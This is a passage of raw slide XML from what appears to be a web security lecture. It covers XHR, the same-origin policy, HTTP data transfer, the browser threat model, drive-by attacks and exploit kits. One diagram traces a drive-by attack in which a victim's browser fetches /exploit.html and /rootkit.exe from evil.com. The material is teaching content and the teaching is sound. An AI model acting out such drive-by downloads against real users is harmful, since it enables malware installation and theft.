            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>from server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>(HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>, XML, JSON)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Update DOM</a:t>
            </a:r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38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5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XHR Example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973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&lt;div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&gt;&lt;/div&gt;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…</a:t>
            </a:r>
            <a:r>
              <a:rPr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form&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr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 smtClean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$(</a:t>
            </a:r>
            <a:r>
              <a:rPr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submit(</a:t>
            </a:r>
            <a:r>
              <a:rPr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form_obj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  <a:endParaRPr lang="en-US" sz="200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var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr = 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new XMLHttpRequest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();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nn-NO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nn-NO" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.open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‘POST’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‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO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xfer.php’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="2000" dirty="0" smtClean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true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nn-NO" sz="20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nn-NO" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>xhr.setRequestHeader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‘Content-type’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‘application/x-www-form-urlencoded’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xhr.onreadystatechange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= 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()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{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smtClean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if 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xhr.readyState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4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&amp;&amp; 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xhr.status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200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$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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html(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xhr.responseText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};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xhr.send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($(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean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).serialize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());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});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31361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Web Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What components make up today’s browsers and web servers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How has this functionality evolved over time?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What security model governs the browser?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks Against Clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cripting (XSS) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Splitting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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ite Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks Against Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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PHP warts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unrestricted Uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CGI shell injection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XHR vs. SOP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1846"/>
            <a:ext cx="10515600" cy="4811550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Legal: requests for objects from the same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>get(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server.php?var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='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my_val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Illegal: requests for objects from other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why not?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$.get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‘https://facebook.com/’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);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Mitigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSONP (old-school, unsafe hack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XDR and CORS (modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>techniques)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More on these later…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1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934286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sending Data Over HTTP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4203"/>
            <a:ext cx="10515600" cy="2060575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Four ways to send data to the server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Embedded in the URL (typically URL encoded, but not always)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In cookies (cookie encoded)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Inside a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>custom HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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In the HTTP request body (form-encoded)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727" y="3777916"/>
            <a:ext cx="10940716" cy="29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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>purchase.html?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>cbw&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=399.99#shopping_cart HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>… other headers…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Cookie: user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>; item=iPad; price=399.99;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>X-My-Header: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>cbw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/iPad/399.99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user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>cbw&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>iPad&amp;price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=399.99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7704440" y="4391527"/>
            <a:ext cx="489065" cy="357390"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60833"/>
              <a:gd name="adj2" fmla="val -1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6413051" y="4748917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4989314" y="5149513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5478379" y="6110259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52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Web Clients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Site Scripting (XSS) and Response Splitting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12181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Client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browser stores a lot of sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your browsing history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Saved usernames and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Saved forms (i.e. credit card numbers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies (especially session cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsers try their hardest to secure this information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i.e. prevent an attacker from stealing this information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, nobody is perfect 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Web Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0" smtClean="0"/>
              <a:t>Model</a:t>
            </a:r>
            <a:endParaRPr sz="4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Attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal information from your browser (i.e. your session cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>bofa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>goal: isolate code from different origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t allow the attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> private information from your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers capability: trick you into clicking a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May direct to a site controlled by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May direct to a legitimate site (but in a nefarious way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61314"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cannot intercept, drop, or modify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No man-in-the-middle attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS is </a:t>
            </a:r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No DNS spoofing or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kaminsky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS and CAs are </a:t>
            </a:r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No Beast, POODLE, or stolen certs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cannot escape browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP restrictions are faithfully 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Browser Exploits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5340"/>
            <a:ext cx="10515600" cy="5352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Browsers are complex pieces of software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Classic vulnerabilities may exist in the network stack, HTML/CSS parser, JS runtime engine, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Plugins expand the vulnerable surface of the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash, Java, Acrobat, …] are large, complex, and widely installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Plugins execute native (x86) code outside the browser’s sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker can leverage browser bugs to craft exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious page triggers and exploits a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often used to conduct Drive-by attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drive-by Download: force the browser to download a file without user intervention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drive-by Install: force the browser to download a file and then execute it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often install Trojan horses, rootkits,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Install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41" y="4077297"/>
            <a:ext cx="1005227" cy="1005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72708" y="3934416"/>
            <a:ext cx="1365649" cy="1485332"/>
            <a:chOff x="8803850" y="4570116"/>
            <a:chExt cx="1365649" cy="1485332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8903461" y="5655338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evil.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2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50" y="4706001"/>
              <a:ext cx="893446" cy="893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617" y="4570116"/>
              <a:ext cx="641882" cy="64188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7" y="2689230"/>
            <a:ext cx="1245186" cy="12451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34322" y="2603937"/>
            <a:ext cx="2307333" cy="1473360"/>
            <a:chOff x="1334322" y="2603937"/>
            <a:chExt cx="2307333" cy="1473360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Curved Connector 15"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="4" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1460793" y="3311823"/>
              <a:ext cx="1161062" cy="765474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34322" y="260393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1) Send malicious link to the victim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3255" y="2557770"/>
            <a:ext cx="6185338" cy="1693664"/>
            <a:chOff x="3053255" y="2557770"/>
            <a:chExt cx="6185338" cy="1693664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3053255" y="3023361"/>
              <a:ext cx="6185338" cy="1228073"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6185338"/>
                <a:gd name="connsiteY0" fmla="*/ 1228073 h 1228073"/>
                <a:gd name="connsiteX1" fmla="*/ 1508235 w 6185338"/>
                <a:gd name="connsiteY1" fmla="*/ 161273 h 1228073"/>
                <a:gd name="connsiteX2" fmla="*/ 5044966 w 6185338"/>
                <a:gd name="connsiteY2" fmla="*/ 108722 h 1228073"/>
                <a:gd name="connsiteX3" fmla="*/ 6185338 w 6185338"/>
                <a:gd name="connsiteY3" fmla="*/ 1170267 h 12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338" h="1228073">
                  <a:moveTo>
                    <a:pt x="0" y="1228073"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="333703" y="787952"/>
                    <a:pt x="667407" y="347831"/>
                    <a:pt x="1508235" y="161273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2349063" y="-25286"/>
                    <a:pt x="4265449" y="-59444"/>
                    <a:pt x="5044966" y="108722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5824483" y="276888"/>
                    <a:pt x="6004910" y="723577"/>
                    <a:pt x="6185338" y="1170267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61485" y="255777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2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>) GET /exploit.html HTTP/1.1</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="20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887200" y="4464266"/>
            <a:ext cx="753087" cy="7530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47697" y="3187287"/>
            <a:ext cx="5896303" cy="1274354"/>
            <a:chOff x="3247697" y="3187287"/>
            <a:chExt cx="5896303" cy="1274354"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3247697" y="3587397"/>
              <a:ext cx="5896303" cy="874244"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 5896303 w 5896303"/>
                <a:gd name="connsiteY0" fmla="*/ 874244 h 874244"/>
                <a:gd name="connsiteX1" fmla="*/ 4598275 w 5896303"/>
                <a:gd name="connsiteY1" fmla="*/ 143775 h 874244"/>
                <a:gd name="connsiteX2" fmla="*/ 1392620 w 5896303"/>
                <a:gd name="connsiteY2" fmla="*/ 59693 h 874244"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 5896303"/>
                <a:gd name="connsiteY3" fmla="*/ 832203 h 8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6303" h="874244">
                  <a:moveTo>
                    <a:pt x="5896303" y="874244"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5622596" y="576888"/>
                    <a:pt x="5348889" y="279533"/>
                    <a:pt x="4598275" y="143775"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3847661" y="8016"/>
                    <a:pt x="2158999" y="-55045"/>
                    <a:pt x="1392620" y="59693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626241" y="174431"/>
                    <a:pt x="313120" y="503317"/>
                    <a:pt x="0" y="832203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8877" y="3187287"/>
              <a:ext cx="2653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3) HTTP/1.1 200 OK</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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4634" y="3780580"/>
            <a:ext cx="5859518" cy="933310"/>
            <a:chOff x="3184634" y="3780580"/>
            <a:chExt cx="5859518" cy="933310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3184634" y="4198695"/>
              <a:ext cx="5859518" cy="515195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49612" y="378058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4) GET /rootkit.exe HTTP/1.1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16165" y="4962089"/>
            <a:ext cx="5859518" cy="905856"/>
            <a:chOff x="3216165" y="4962089"/>
            <a:chExt cx="5859518" cy="905856"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Freeform 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3216165" y="4962089"/>
              <a:ext cx="5859518" cy="402990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9520" y="5467835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5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>) HTTP/1.1 200 OK</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="20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31992"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="871703">
            <a:off x="1516498" y="4220791"/>
            <a:ext cx="2146635" cy="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Kits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Drive-by attacks have become commoditized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit packs contain tens or hundreds of known browser exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Constantly being updated by dedicated teams of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>blackhats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easy to deploy by novices, no need to write low-level exploits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MPack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Angler, and Nuclear EX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often used in conjunction with legitimate, compromised websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Legit site is hacked and modified to redirect to the attackers website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers site hosts the exploit kit as well as a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anyone visiting the legit site is unwittingly attacked and exploited.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Threat Model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61314"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cannot intercept, drop, or modify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No man-in-the-middle attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS is </a:t>
            </a:r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No DNS spoofing or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kaminsky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS and CAs are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No Beast, POODLE, or stolen certs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cannot escape browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP restrictions are faithfully enforced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
